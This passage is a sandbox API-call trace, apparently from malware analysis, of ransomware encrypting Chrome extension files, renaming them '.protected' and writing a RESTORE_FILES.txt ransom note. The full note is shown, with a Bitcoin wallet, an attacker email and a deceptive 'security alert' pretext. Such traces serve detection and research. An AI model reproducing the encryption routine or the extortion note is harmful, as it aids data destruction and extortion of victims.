(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.511] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.511] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.511] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.511] CloseHandle (hObject=0x164) returned 1 [0081.511] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.511] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0081.511] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0081.512] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0081.512] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned 141 [0081.512] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0081.512] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*") returned 143 [0081.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.512] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.512] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.512] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.512] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\.") returned 143 [0081.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.512] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.512] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.512] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.512] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.512] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\..") returned 144 [0081.512] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.512] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.512] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.512] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.512] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.513] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.513] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.513] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.513] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.513] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0081.514] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.514] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0081.514] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.514] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.514] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.514] CloseHandle (hObject=0x168) returned 1 [0081.514] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.protected") returned 165 [0081.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.protected")) returned 1 [0081.515] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.515] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.515] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0081.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.515] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.515] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.516] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.516] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.516] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.516] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.516] CloseHandle (hObject=0x164) returned 1 [0081.516] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0081.516] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned 141 [0081.516] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0081.516] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0081.516] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*") returned 143 [0081.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.516] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.516] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.517] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.517] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.517] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\.") returned 143 [0081.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.517] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.517] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.517] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.517] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.517] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.517] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\..") returned 144 [0081.517] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.517] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.517] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.517] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.517] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.517] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.518] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.518] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.518] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.518] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0081.518] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.518] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0081.518] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.518] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.519] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.519] CloseHandle (hObject=0x168) returned 1 [0081.519] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.protected") returned 165 [0081.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.protected")) returned 1 [0081.519] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.519] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.519] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0081.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.520] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.520] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.520] lstrlenA 